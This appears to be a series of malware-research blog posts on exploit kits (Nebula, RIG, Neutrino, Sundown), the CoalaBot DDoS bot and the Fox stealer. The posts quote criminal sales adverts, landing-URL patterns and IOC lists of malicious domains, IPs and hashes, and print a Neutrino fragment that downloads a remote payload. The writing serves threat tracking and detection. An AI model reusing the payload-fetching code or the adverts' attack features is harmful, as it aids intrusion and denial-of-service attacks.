CoalaBot appears to be build on August Stealer code (Panel and Traffic are really alike)I found it spread as a tasks in a Betabot and in an Andromeda spread via RIG fed by at least one HilltopAds malvertising. 2017-09-11: a witnessed infection chain to CoalaBotA look inside :CoalaBot: Login Screen(August Stealer alike) CoalaBot: StatisticsCoalaBot: BotsCoalaBot: TasksCoalaBot: TasksCoalaBot: New Taks (list)CoalaBot: https get task detailsCoalaBot: http post task detailsCoalaBot: SettingsHere is the translated associated advert published on 2017-08-23 by a user going with nick : Discomrade.(Thanks to Andrew Komarov and others who provided help here).------------------------------------------Coala Http Ddos Bot The software focuses on L7 attacks (HTTP). Lower levels have more primitive attacks.Attack types:• ICMP (PING) FLOOD• UDP FLOOD• TCP FLOOD• HTTP ARME• HTTP GET *• HTTP POST *• HTTP SLOWLORIS *• HTTP PULSE WAVE ** - Supports SMART mode, i.e. bypasses Cloudflare/Blazingfast and similar services (but doesn’t bypass CAPTCHA). All types except ICMP/UDP have support for using SSL.Binary:• .NET 2.0 x86 (100% working capacity WIN XP - WIN 7, on later versions ОС .NET 2.0 disabled by default)• ~100kb after obfuscation• Auto Backup (optional)• Low CPU load for efficient use• Encryption of incoming/outgoing traffic• No installation on machines from former CIS countries(RU/UA/BL/KZ/...)• Scan time non-FUD. Contact us if you need a recommendation for a good crypting service.• Ability to link a build to more than one gate.Panel:• Detailed statistics on time online/architecture/etc. • List of bots, detailed information• Number count of requests per second (total/for each bot)• Creation of groups for attacks• Auto sorting of bots by groups • Creation of tasks, the ability to choose by group/country• Setting an optional time for bots success rate Other:• Providing macros for randomization of sent data • Support of .onion gate• Ability to install an additional layer (BOT => LAYER => MAIN GATE) Requirements:• PHP 5.6 or higher• MySQL• Мodule for MySQLi(mysqli_nd); php-mbstring, php-json, php-mcrypt extensionsScreenshots:• Statistics- http://i.imgur.com/FUevsaS.jpg• Bots - http://i.imgur.com/nDwl9pY.jpg• Created tasks - http://i.imgur.com/RltiDhl.png• Task List - http://i.imgur.com/tqEEpX0.jpg• Settings - http://i.imgur.com/EbhExjE.jpgPrice:• $300 - build and panel. Up to 3 gates for one build.• $20 - rebuildThe price can vary depending on updates.Escrow service is welcome.Help with installation is no charge.------------------------------------------Sample:VT linkMD5 f3862c311c67cb027a06d4272b680a3bSHA1 0ff1584eec4fc5c72439d94e8cee922703c44049SHA256 fd07ad13dbf9da3f7841bc0dbfd303dc18153ad36259d9c6db127b49fa01d08fEmerging Threats rules :2024531 || ET TROJAN MSIL/CoalaBot CnC ActivityRead More:August in November: New Information Stealer Hits the Scene - 2016-12-07 - Proofpoint

Nebula LogoWhile Empire (RIG-E) disappeared at the end of December after 4 months of activityIllustration of  the last month of witnessed Activity for Empireon 2017-02-17 an advert for a new exploit kit dubbed Nebula appeared underground.------Selling EK Nebula------Nebula Exploit kitFeatures:-Automatic domain scanning and generating (99% FUD)-API rotator domains-Exploit rate tested in different traffic go up 8/19%-knock rate tested whit popular botnet go 30/70%-Clean and modern user interface-Custom domains & server ( add & point your own domains coming soon...)-Unlimited flows & files-Scan file & domains-Multiple payload file types supported (exe , dll , js, vbs)-Multi. geo flow (split loads by country & file)-Remote file support ( check every 1 minute if file hash change ; if changed replace ) for automatic crypting-Public stats by file & flow-latest CVE-2016 CVE-2017-custom features just ask supportSubscriptions:24h - 100$7d - 600$31d - 2000$Jabber - nebula-support@xmpp.jpOffering free tests to trusted users ------In same thread some screenshots were shared by a customer.Earlier that same day, colleagues at Trendmicro told me they were seeing activity from a group we are following under the name "GamiNook" (illustration coming later) in Japan redirecting traffic to a variation of Sundown."GamiNook" redirecting to a Sundown Variation in Japan - 2017-02-17Payload : Pitou (6f9d71eebe319468927f74b93c820ce4 ) This Sundown variation was not so much different from the mainstream one.No "index.php?" in the landing URI, different domain pattern but same landing, exploits, etc... Some payload sent in clear (01.php) other RC4 encoded (00.php) as for Sundown.Digging more it appeared it was featuring an Internal TDS (as Empire). The same exact call would give you a different payload in France or in United Kingdom/Japan."GamiNook" traffic with geo in France - 2017-02-17Identicall payload call gives you Gootkit instead of PitouPayload : Gootkit (48ae9a5d10085e5f6a1221cd1eedade6)Note: to be sure that the payload difference is tied to Geo and not time based (rotation or operator changing it ) you need to make at least a third pass with first Geo and ensure dropped sample is identical as in first pass.At that point you can only suspect this Sundown variant might be Nebula (even if clues are multiple, a funny one being that the traffic illustrated in the advert thread is quite inline with the one captured in France).So I was naming that variation: Sundown-N. Intel shared by Frank Ruiz (FoxIT) on the 21st allowed me to know for sure this traffic was indeed Nebula.The following days i saw other actor sending traffic to this EK.Taxonomy tied to Nebula Activity in MISP - 2017-03-02Taxonomy tied to GamiNook traffic activity, EK and resulting payloadToday URI pattern changed from this morning :/?yWnuAH-XgstCZ3E=tCi6ZGr10KUDHiaOgKVNolmBgpc3rkRp-weok1A2JV-gkpS0luBwQDdM/?yXy3HX2F=tCu_Mj322aEBSXjYhatLoVmBgZJh_0Fg_wX_zQYxIg6nksDowOciFzNB/?yXzbGV2jkcB_eU8=4ya6MDz31KdQTi7ahapLolnWjJdj_EJt-VT4mwQxIQ6gksTllrB3EGRM/?ykjaKniEk6ZhH1-P=si-8YGj_1aANTynfh6Ye81mHhZE0_RNs_gn5nAExcV6okpTknOQgEmNN/?z0vDa0iBu-Q=tHnqNT_-1KcGGCzfhqVKoVmB08dm_BJt-QKumQEwJA2nksGyk-QhQDRA/?z13qMVqqoKRvTw=5S--Y2uk0apQGiyOhvdI81nQhZMwqxVo9FSsmVAyIgiokpPnl-V0QDIf/?z1fECTiT=sy7tYmz206FUGCvagKpK9VmGhMAxrxZq_1CungQwdF71ksDowOciFzNB/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksTllrB3EGRM/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksW2w7QsRTIf/?zWnBFniM=4Ca9Zjej0PRTGC3e06FJp1nVjJA1rBRpqleumABkJF2hksTllrB3EGRM/?zn3iKU_xjeNxWw=sHu7MTry2aoAFCyKgKUY8FmF0ZZi_kFg9ASimVQ2cl-lksTllrB3EGRM/?zy3jN0Gvi9RjY02F2g=4H27Yjn-0_EBHSrc26MfoVnV15Yx-hJqrwWrnwJjcVqnkpTknOQgEmNN(which is Sundown/Beps without the index.php) to/86fb7c1b/showpost.php?s=af75b6af5d0f08cf675149da13b1d3e4&p=13&postcount=8/641222267738845/thumb/6456dac5bc39ec7/comment_post.php?ice=bDaE06lCQU/507728217866857/9ecc534d/bug_report/media/pr.php?id=b38cb0526f8cd52d878009d9f27be8f4/gu/Strategy/qNXL8WmQ6G/rss.php?cat=MSFT/moddata/a9/showpost.php?s=0d2d722e1a2a625b3ceb042daf966593&p=13&postcount=1/2003/01/27/exchange-monday-wilderness/46198923243328031687/applications/blockStyle.php?last-name=6419f08706689953783a59fa4faeb75c/5wtYymZeVy/LKYcSFhKOi/showpost.php?s=2e3e8a3c3b6b00cd3033f8e20d174bf5&p=8&postcount=7/2006/08/05/fur-copper-shark/48396170957391254103/XD25OYwON1/showpost.php?s=abf72cd40a08463fad0b3d153da66cae&p=27&postcount=7/tV9FnNwo4h/b303debe9a6305791b9cd16b1f10b91e/promotion.php?catid=h/ef131fb2025525a/QLGWEFwfdh/550991586389812/core.write_file.php?lawyer=9H6UhvusOi/aPKr0Oe5GV/23861001482170285181/showpost.php?s=e74b32ba071772d5b55f97159db2e998&p=2&postcount=1/2/eb799e65a412b412ee63150944c7826d61cd7a544f7aa57029a9069698b4925b2068ed77dea8dc6210b933e3ecf1f35b/showthread.php?t=18024&page=14/js/archives/3f635a090e73f9b/showthread.php?t=6636&page=18/59cdf39001a623620bd7976a42dde55f190382060a264e21809fc51f/ff0a503d59ddb4d5e1fb663b6475dfe0ba08f0b84ce8692d/viewtopic.php?f=84&t=48361/615147354246727/339824645925013/nqHgct4sEE/showthread.php?t=51299&page=20/2012/04/22/present-measure-physical-examination(for those who would like to build their regexp, more pattern available here : https://raw.githubusercontent.com/Kafeine/public/master/Nebula_URI )2017-03-02 Nebula with its new pattern used here to drop Ramnit via Malvertising in NA - 2017-03-02This landing pattern change triggered the publication of this post. Nebula might end up not being a "vapor" EK but let's wait and see. The only difference with Sundown till today was its internal TDS.Exploits: CVE-2014-6332 + CVE-2015-0016CVE-2013-2551CVE-2016-0189 godmodeCVE-2015-8651CVE-2015-7645CVE-2016-4117Files:  Nebula_2017-03-02 (2 fiddler - password is malware)Acknowledgement :Thanks Joseph C Chen and Brooks Li (Trendmicro),  Frank Ruiz (Fox-IT InTELL) and Andrew Komarov ( InfoArmor Inc. ) for the help on different aspect of this post.Edit:2017-03-03 Corrected some CVE id + not all payload are in clear---Some IOCsDateSha256Comment2017/02/17f4627005c018071f8ec6b084eef3936e3a267660b0df99ffa0d27a8d943d1af5Flash Exploit (CVE-2016-4117)2017/02/27be86dc88e6337f09999991c206f890e0d52959d41f2bb4c6515b5442b23f2eccFlash Exploit (CVE-2016-4117)2017/02/1767d598c6acbd6545ab24bbd44cedcb825657746923f47473dc40d0d1f122abb6Flash Exploit (CVE-2015-7645 Sample seen previously in Sundown)2017/02/1704fb00bdd3d2c0667b18402323fe7cf495ace5e35a4562e1a30e14b26384f41cFlash Exploit (CVE-2015-8651 Sample seen previously in Sundown)2017/02/17b976cf6fd583b349e51cb34b73de6ef3a5ee72f86849f847b9158b4a7fb2315cPitou2017/02/176fe13d913f4d3f2286f67fbde08ab17418ba8370410e52354ffa12a0aaf498f8Gootkit2017/02/221a22211d01d2e8746efe0d14ab7e1e547c3e30863a83e0884a9d90325bd7b64bRamnit2017/03/026764f98ba6509b3351ad2f960dcc47c27d0dc00d53d7e0ae132a7c1d15067f4aDiamondFoxDateDomainIPComment2017/02/17tci.nhnph.com188.209.49.135Nebula Payload Domain2017/02/22gnd.lplwp.com188.209.49.135Nebula Payload Domain2017/02/24qcl.ylk8.xyz188.209.49.23Nebula Payload Domain2017/02/28hmn.losssubwayquilt.pw93.190.141.166Nebula Payload Domain2017/03/02qgg.losssubwayquilt.pw93.190.141.166Nebula Payload Domain2017/02/17agendawedge.shoemakerzippersuccess.stream188.209.49.135Nebula2017/02/17clausmessage.nationweekretailer.club217.23.7.15Nebula2017/02/17equipmentparticle.shockadvantagewilderness.club217.23.7.15Nebula2017/02/17salaryfang.shockadvantagewilderness.club217.23.7.15Nebula2017/02/22deficitshoulder.lossicedeficit.pw188.209.49.135Nebula2017/02/22distributionjaw.hockeyopiniondust.club188.209.49.135Nebula2017/02/22explanationlier.asiadeliveryarmenian.pro188.209.49.135Nebula2017/02/23cowchange.distributionstatementdiploma.site188.209.49.151Nebula2017/02/23instructionscomposition.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/23paymentceramic.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/23soldierprice.distributionstatementdiploma.site188.209.49.135Nebula2017/02/23swissfacilities.gumimprovementitalian.stream188.209.49.135Nebula2017/02/23transportdrill.facilitiesturkishdipstick.info188.209.49.135Nebula2017/02/24authorisationmessage.casdfble.stream188.209.49.151Nebula2017/02/24cowchange.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24departmentant.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24disadvantageproduction.brassreductionquill.site188.209.49.151Nebula2017/02/24disadvantageproduction.casdfble.stream188.209.49.151Nebula2017/02/24europin.pedestrianpathexplanation.info188.209.49.151Nebula2017/02/24hygienicreduction.brassreductionquill.site188.209.49.151Nebula2017/02/24hygienicreduction.casdfble.stream188.209.49.151Nebula2017/02/24instructionscomposition.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24jobhate.pedestrianpathexplanation.info188.209.49.151Nebula2017/02/24limitsphere.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24paymentceramic.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24penaltyinternet.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/24phonefall.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/24printeroutput.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24redrepairs.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24soldierprice.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24suggestionburn.distributionstatementdiploma.site188.209.49.151Nebula2017/02/25advertiselaura.bubblecomparisonwar.top188.209.49.49Nebula2017/02/25apologycattle.gramsunshinesupply.club188.209.49.151Nebula2017/02/25apologycattle.gramsunshinesupply.club188.209.49.49Nebula2017/02/25apologycattle.gramsunshinesupply.club93.190.141.39Nebula2017/02/25apologycold.shearssuccessberry.club188.209.49.151Nebula2017/02/25authorizationmale.foundationspadeinventory.club188.209.49.151Nebula2017/02/25birthdayexperience.foundationspadeinventory.club188.209.49.151Nebula2017/02/25confirmationaustralian.retaileraugustplier.club188.209.49.151Nebula2017/02/25dancerretailer.shearssuccessberry.club188.209.49.151Nebula2017/02/25employergoods.deliverycutadvantage.info188.209.49.151Nebula2017/02/25fallhippopotamus.deliverycutadvantage.info188.209.49.151Nebula2017/02/25goallicense.shearssuccessberry.club188.209.49.151Nebula2017/02/25goalpanda.retaileraugustplier.club188.209.49.151Nebula2017/02/25holidayagenda.retaileraugustplier.club188.209.49.151Nebula2017/02/25marketsunday.deliverycutadvantage.info188.209.49.151Nebula2017/02/25penaltyinternet.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/25phonefall.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/25purposeguarantee.shearssuccessberry.club188.209.49.151Nebula2017/02/25rainstormpromotion.gramsunshinesupply.club188.209.49.151Nebula2017/02/25rainstormpromotion.gramsunshinesupply.club188.209.49.49Nebula2017/02/25rainstormpromotion.gramsunshinesupply.club93.190.141.39Nebula2017/02/25rollinterest.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/25startguarantee.gramsunshinesupply.club188.209.49.151Nebula2017/02/25startguarantee.gramsunshinesupply.club188.209.49.49Nebula2017/02/26advantagelamp.numberdeficitc-clamp.site93.190.141.39Nebula2017/02/26apologycattle.gramsunshinesupply.club93.190.141.39Nebula2017/02/26budgetdegree.maskobjectivebiplane.trade93.190.141.200Nebula2017/02/26competitionseason.numberdeficitc-clamp.site93.190.141.39Nebula2017/02/26customergazelle.cyclonesoybeanpossibility.bid93.190.141.39Nebula2017/02/26decembercommission.divingfuelsalary.trade93.190.141.200Nebula2017/02/26distributionfile.edgetaxprice.site93.190.141.45Nebula2017/02/26equipmentwitness.maskobjectivebiplane.trade93.190.141.200Nebula2017/02/26invoiceburst.cyclonesoybeanpossibility.bid93.190.141.39Nebula2017/02/26invoicegosling.edgetaxprice.site93.190.141.45Nebula2017/02/26jailreduction.edgetaxprice.site93.190.141.45Nebula2017/02/26rainstormpromotion.gramsunshinesupply.club93.190.141.39Nebula2017/02/26startguarantee.gramsunshinesupply.club93.190.141.39Nebula2017/02/27afforddrill.xzv4rzuctndfo.club93.190.141.45Nebula2017/02/27approveriver.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/27burglarsatin.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/27distributionfile.edgetaxprice.site93.190.141.45Nebula2017/02/27invoicegosling.edgetaxprice.site93.190.141.45Nebula2017/02/27jailreduction.edgetaxprice.site93.190.141.45Nebula2017/02/27lipprice.edgetaxprice.site93.190.141.45Nebula2017/02/27marginswiss.divingfuelsalary.trade93.190.141.200Nebula2017/02/27outputfruit.divingfuelsalary.trade93.190.141.200Nebula2017/02/27rainstormpromotion.gramsunshinesupply.club93.190.141.39Nebula2017/02/27reindeerprofit.divingfuelsalary.trade93.190.141.200Nebula2017/02/27reminderdonna.divingfuelsalary.trade93.190.141.200Nebula2017/02/27startguarantee.gramsunshinesupply.club93.190.141.39Nebula2017/02/27supplyheaven.gramsunshinesupply.club93.190.141.39Nebula2017/02/27transportbomb.gramsunshinesupply.club93.190.141.39Nebula2017/02/28afforddrill.xzv4rzuctndfo.club93.190.141.45Nebula2017/02/28agesword.alvdxq1l6n0o.stream93.190.141.166Nebula2017/02/28authorparticle.390a20778a68d056c40908025df2fc4e.site93.190.141.45Nebula2017/02/28bakermagician.alvdxq1l6n0o.stream93.190.141.166Nebula2017/02/28bombclick.alvdxq1l6n0o.stream93.190.141.166Nebula2017/02/28burglarsatin.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/28certificationplanet.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28chooseravioli.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28coachadvantage.reportattackconifer.site93.190.141.39Nebula2017/02/28databasesilver.reportattackconifer.site93.190.141.39Nebula2017/02/28date-of-birthtrout.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28dependentswhorl.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/28derpenquiry.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28domainconsider.mxkznekruoays.trade93.190.141.200Nebula2017/03/01agesword.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/01authorparticle.390a20778a68d056c40908025df2fc4e.site93.190.141.45Nebula2017/03/01bakermagician.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/01bombclick.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02actressheight.knowledgedrugsaturday.club93.190.141.45Nebula2017/03/02agesword.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02applywholesaler.tboapfmsyu.stream93.190.141.200Nebula2017/03/02approvepeak.knowledgedrugsaturday.club93.190.141.45Nebula2017/03/02bakermagician.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02bombclick.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02borrowfield.77e1084e.pro93.190.141.45Nebula2017/03/02boydescription.356020817786fb76e9361441800132c9.win93.190.141.39Nebula2017/03/02buglecommand.textfatherfont.info93.190.141.39Nebula2017/03/02buysummer.77e1084e.pro93.190.141.45Nebula2017/03/02captaincertification.77e1084e.pro93.190.141.45Nebula2017/03/02chargerule.textfatherfont.info93.190.141.39Nebula2017/03/02cityacoustic.textfatherfont.info93.190.141.39Nebula2017/03/02clickbarber.356020817786fb76e9361441800132c9.win93.190.141.39Nebula

CVE-2016-7200 & CVE-2016-7201 are vulnerabilities in the Chakra JavaScript scripting engine in Microsoft Edge. Reported by Natalie Silvanovich of Google Project Zero, those have been fixed  in november 2016 (MS16-129) by Microsoft.Note : No successful exploitation seen despite integration tries.On 2017-01-04 @theori_io released a POCProof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) —https://t.co/DnwQt5giMB— Theori (@theori_io) 4 janvier 2017providing again (cf CVE-2016-0189) ready-to-use code to Exploit Kit maintainer.After not far from 6 months without new exploit integrated in an EK ecosystem which has lost its innovation locomotive (Angler) , the drive-by landscape is struggling to stay in shape. Low infection rate means more difficulties to properly convert bought traffic.The exploits are spotted first in Sundown, but integration in RIG/Empire/Neutrino/Magnitude/Kaixin should be a matter of hours/days.[edit : 2017-01-10]​I have been told that with Win10 1607, Microsoft Edge has some quite strong mitigation: no WinExec, no CreateProcess, no ShellExecute, meaning every child process creation is blocked. The PoC might need a little more "magic powder" to work there.[/edit]Sundown:2017-01-06Sundown EK firing CVE-2016-7200/7201 to Edge 2017-01-06No exploitation here thoughFiddler: Sundown_Edge__CVE-2016-7201_170106.zip (password is malware)Out of topic: expected payload in that infection chain was zloader. (other payload seen in past weeks dropped via Sundown : Zeus Panda, Neutrino Bot, Dreambot, Chthonic, Andromeda, Smokebot, Betabot, Remcos, IAP, RTM, Kronos, Bitcoin Miner)Neutrino:2017-01-14--Thanks to Trendmicro for the multiple inputs that allowed me to keep plugged to this infection chain.--So as explained previously Neutrino is now in full private mode and fueled via Malvertising bought to several ad agencies (e.g. ZeroPark, ClickAdu, PropellerAds, HillTopAds) by a Traffer actor which I tag as NeutrAds. Their infection chain is now accepting/redirecting Microsoft Edge Browser as well.Without big surprise a new exploit is included in the Flash bundle : nw27 >  CVE-2016-7200/7201.NeutrAds redirect is now  accepting Edge traffic - 2017-01-14Neutrino Embedding CVE-2016-7200/7201 - 2017-01-14(Neutrino-v flash ran into Maciej ‘s Neutrino decoder )Extracted CVE-2016-7200/7201  elements - 2017-01-14Note: i did not get infection with- Edge 25.10586.0.0 / EdgeHTML 13.10586- Edge 20.10240.16384.0Fiddler&Pcap : Neutrino-v_CVE-2016-72007201_170114.zip  (Password is malware)Extracted exploits: Neutrino_2017-01-14.zip (Password is malware)reveiled[.space|45.32.113.97 - NeutrAds Filtering Redirectorvfwdgpx.amentionq[.win|149.56.115.166 - Neutrino Payload in that pass : Gootkit - b5567655caabb75af68f6ea33c7a22dbc1a6006ca427da6be0066c093f592610Associated C2 :buyyou[.org | 204.44.118.228felixesedit[.comfastfuriedts[.org monobrosexeld[.orgSo those days, in Asia you'll most probably get Cerber and in EU/NA you'll most probably get GootkitMISP : taxonomy illustrating some NeutrAds into Neutrino-v recorded activity (and post infection)Kaixin:2017-01-15 Finding by Simon ChoiCVE-2016-7200/7201 code fired by Kaixin - 2017-01-16Fiddler : Kaixin_2017-01-16.zip (Password is malware)Out of topic: payload in another pass (not fired by this exploit) was Blackmoon/Banbra 6c919213b5318cdb60d67a4b4ace709dfb7e544982c0e101c8526eff067c8332Callback:http://r.pengyou[.com/fcg-bin/cgi_get_portrait.fcg?uins=1145265195http://67.198.186[.254/ca.php?m=525441744D5441744D6A63744E3055744D554D745130493D&h=437Edits:2016-11-10 - Adding information about mitigation on Edge2016-11-14 - Adding Neutrino2016-11-16 - Fixed the screenshot for Neutrino. Was stating CVE-2016-4117 was there. It's not2016-11-16 - Adding KaixinRead More:Three roads lead to Rome - Qihoo360 - 2016-11-29Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) - Theori-io - 2017-01-04

  Around the middle of August many infection chains transitioned to RIG with more geo-focused bankers and less CryptXXX (CryptMic) Ransomware. Picture 1: Select Drive-by landscape - Middle of August 2016 vs Middle of July 2016RIG += internal TDS :Trying to understand that move, I suspected and confirmed the presence of an internal TDS (Traffic Distribution System) inside RIG Exploit Kit [Edit 2016-10-08 : It seems this functionality is limited to Empire Pack version of RIG]I believe this feature appeared in the EK market with Blackhole (if you are aware of a TDS integrated earlier directly in an EK please tell me) Picture2: Blackhole - 2012 - Internal TDS illustrationbut disappeared from the market with the end of Nuclear Pack Picture3: Nuclear Pack - 2016-03-09 - Internal TDS illustrationand Angler EK Picture 4 : Angler EK - Internal TDS illustrationThis is a key feature for load seller. It is making their day to day work with traffic provider far easier . It allows Exploit Kit operator to attach multiple payloads to a unique thread. The drop will be conditioned by Geo (and/or OS settings) of the victim.Obviously you can achieve the same result with any other exploit kit…but things are a little more difficult. You have to create one Exploit Kit thread per payload, use an external TDS (like Keitaro/Sutra/BlackHat TDS/SimpleTDS/BossTDS, etc…) and from that TDS, point the traffic to the correct Exploit Kit thread (or, if you buy traffic, tell your traffic provider where to send traffic for each targeted country). Picture 5: A Sutra TDS in action in 2012 - cf The path to infection RIG += RC4 encryption, dll drop and CVE-2016-0189:Around 2016-09-12 a variation of RIG (which i flag as RIG-v in my systems) appeared.A slightly different landing obfuscation, RC4 encoding, Neutrino-ish behavioral and added CVE-2016-0189 Picture 6: RIG-v Neutrino-ish behavioral captured by Brad Spengler’s modified cuckoo Picture 7: CVE-2016-0189 from RIG-v after 3 step de-obfuscation pass.Neutrino waves goodbye ?On 2016-09-09 on underground it has been reported a message on Jabber from the Neutrino seller account :“we are closed. no new rents, no extends more”This explains a lot. Here are some of my last Neutrino pass for past month. Picture 8: Some Neutrino passes for past month and associated taxonomy tags in MispAs you can see several actors were still using it…Now here is what i get for the past days : Picture 9: Past days in DriveBy land Not shown here, Magnitude is still around, mostly striking in AsiaDay after day, each of them transitioned to RIG or “RIG-v”. Around the 22nd of September 2016 the Neutrino advert and banner disappeared from underground. Picture 10: Last banner for Neutrino as of 2016-09-16Are we witnessing the end of Neutrino Exploit Kit ? To some degree. In fact it looks more like Neutrino is going in full “Private” mode “a la” Magnitude.Side reminder : Neutrino disappeared from march 2014 till november 2014A Neutrino VariantSeveral weeks ago, Trendmicro (Thanks!!) made me aware of a malvertising chain they spotted in Korea and Taiwan involving Neutrino. Picture 11: Neutrino-v pass on the 2016-09-21Upon replay I noticed that this Neutrino was somewhat different. Smoother CVE-2016-4117, more randomization in the landing, slightly modified flash bundle of exploits Picture 12: Neutrino-v flash ran into Maciej ‘s Neutrino decoder Note the pnw26 with no associated binary data, the rubbish and additionalInfoA Sample : 607f6c3795f6e0dedaa93a2df73e7e1192dcc7d73992cff337b895da3cba5523 Picture 13: Neutrino-v behavioral is a little different : drops name are not generated via the GetTempName api function k2(k) { var y = a(e + "." + e + "Request.5.1"); y.setProxy(n); y.open("GET", k(1), n); y.Option(n) = k(2); y.send(); if (200 == y.status) return Rf(y.responseText, k(n)) };Neutrino-v ensuring Wscript will use the default proxy (most often when a proxy is configured it’s only for WinINet , WinHTTP proxy is not set and Wscript will try to connect directly and fail)I believe this Neutrino variant is in action in only one infection chain (If you think this is inaccurate, i’d love to hear about it) Picture 14: Neutrino-v seems to be used by only one actor to spread Cerber 0079xThe actor behind this chain is the same as the one featured in the Malwarebytes Neutrino EK: more Flash trickery post.Empire Pack:Coincidentally a new Exploit Kit is being talked about underground : Empire Pack. Private, not advertised. Picture 15: King of Loads - Empire Pack PanelSome might feel this interface quite familiar…A look a the favicon will give you a hint Picture 16: RIG EK favicon on Empire Pack panel Picture 17: RIG PanelIt seems Empire Pack project was thought upon Angler EK disappearance and launched around the 14th of August 2016.[Speculation] I think this launch could be related to the first wave of switch to RIG that occurred around that time. I think, Empire Pack is a RIG instance managed by a Reseller/Load Seller with strong underground connections. [/Speculation]RIG-v is a “vip” version of RIG. Now how exactly those three elements (RIG, RIG-v, Empire Pack) are overlapping, I don’t know. I am aware of 3 variants of the API to RIGapi.php : historical RIG api3.php : RIG with internal TDS [ 2016-10-08 :  This is Empire Pack. Appears to be using also remote_api after this post went live. I flag it as RIG-E ]remote_api.php : RIG-vBut Empire Pack might be api3, remote_api, or a bit of both of them.By the way RIG has also (as Nuclear and Angler endup doing) added IP Whitelisting on API calls to avoid easy EK tracking from there.   :-" (Only whitelisted IP - from declared redirector or external TDS - can query the API to get the current landing) ConclusionLet’s just conclude this post with statistics pages of two Neutrino threads Picture 18: Neutrino stats - Aus focused thread - 2016-07-15Picture 19: Neutrino stats on 1 Million traffic - 2016-06-09“We will be known forever by the tracks we leave”Santee Sioux TribeSome IOCsDateDomainIPComment2016-10-01szsiul.bluekill[.]top137.74.55.6Neutrino-v2016-10-01twqivrisa.pinkargue[.]top137.74.55.7Neutrino-v2016-10-01u0e1.wzpub4q7q[.]top185.117.73.80RIG-E (Empire Pack)2016-10-01adspixel[.]site45.63.100.224NeutrAds Redirector2016-09-30re.flighteducationfinancecompany[.]com109.234.37.218RIG-v2016-09-28add.alislameyah[.]org193.124.117.13RIG-v2016-09-28lovesdeals[.]ml198.199.124.116RIG-v2016-09-27dns.helicopterdog[.]com195.133.201.23RIG2016-09-26sv.flickscoop[.]net195.133.201.41RIG2016-09-26red.truewestcarpetcare[.]com195.133.201.11RIG-v2016-09-26oitutn.yellowcarry[.]top78.46.167.130NeutrinoAcknowledgementsThanks Malc0de, Joseph C Chen (Trendmicro), Will Metcalf ( EmergingThreat/Proofpoint) for their inputs and help on multiple aspect of this post.Edits2016-10-03 :Removed limitation to KOR and TWN for Neutrino-v use by NeutrAds as Trendmicro informed me they are now seeing them in other Geos.Added explanation about the IP whitelisting on RIG API (it was not clear)2016-10-08 :Updated with gained information on Empire Pack2016-11-01 :RIG standard is now also using the pattern introduces past week by RIG-v. It's now in version 4.https://twitter.com/kafeine/status/790482708870864896RIG panelThe only instance of RIG using old pattern is Empire Pack (which previously could be guessed by domains pattern)2016-11-18 : Empire (RIG-E) is now using RC4 encoding as well. (still on old pattern and landing)RIG-E Behavioral2016-12-03RIG-v has increased filtering on IP ranges and added a pre-landing to filter out non IE traffic.2016-12-03 RIG-v Pre-landingRead MoreRIG’s Facelift - 2016-09-30 - SpiderLabs Is it the End of Angler ? - 2016-06-11 Neutrino : The come back ! (or Job314 the Alter EK) - 2014-11-01 Hello Neutrino ! - 2013-06-07The path to infection - Eye glance at the first line of “Russian Underground” - 2012-12-05

Gift for SweetTail-Fox-mlp by Mad-N-MonstrousSmall data drop about another Pony fork : Fox stealer.First sample of this malware I saw was at beginning of September 2016 thanks to Malc0de. After figuring out the panel name and to which advert it was tied we were referring to it as PonyForx.Advert :2016-08-11 - Sold underground by a user going with nickname "Cronbot"--------Стилер паролей и нетолько - Fox v1.0Мы выпускаем продукт на продажу. Уже проходит финальная стадия тестирования данного продукта.О продукте : 1. Умеет все что умеет пони. + добавлен новый софт.2. Актуален на 2016 год.3. Написан на С++ без дополнительных библиотек.4. Админка от пони.Условия : 1. Только аренда.2. Распространяется в виде EXE и DLL.3. Исходники продавать не будем.Аренда 250$ в месяц.Исходники 2000$ разово.----Translated by Jack Urban : ----Password stealer and more - Fox v.1.0We are releasing the product for general sale. Final stage of testing for this product is already underway.About the product:1. Is able to do everything that pony does. + new software has been added.2. Relevant for 2016.3. Written in C++ without additional libraries.4. Admin from pony.Conditions:1. For rent only.2. Distributed as an EXE and DLL.3. We will not be selling the source.Rent is $250 a month.Originals are a 2000$ one time fee. --------It's being loaded (with Locky Affid 13) by the Godzilla from ScriptJS (aka AfraidGate) group .MISP taxonomy tags reflecting ScriptJS activity in the last months(note : it's not the first time this group is pushing a stealer, they were dropping Pony with their Necurs between August and December 2015 [1] )2016-09-26 - ScriptJS infection chain into Neutrino into Godzilla loader into PonyForx and Locky Affid 13Here we can see the browsing 